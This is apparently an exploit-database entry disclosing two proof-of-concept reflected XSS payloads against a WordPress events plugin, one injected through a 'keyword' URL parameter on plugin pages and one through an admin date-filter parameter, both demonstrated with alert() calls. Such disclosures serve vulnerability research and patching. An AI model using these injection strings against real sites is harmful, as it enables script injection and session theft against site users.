## https://sploitus.com/exploit?id=WPEX-ID:9C271619-F478-45C3-91D9-BE0F55EE06A2
POC 1 - Visit any of the following pages created by the plugin:
- Event Organizers
- Event Types
- Performers
- Venues
Add the `keyword` parameter to the URL with following text and load the new URL to trigger the XSS.
E.g. https://example.com/event-types/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3E
---
POC 2 - Visit the following URL:
https://example.com/wp-admin/edit.php?post_type=em_event&ep_filter_date=2023-08-08"+onmouseover%3Dalert(%2FXSS%2F)+"
Mouseover the date filter input to trigger the XSS.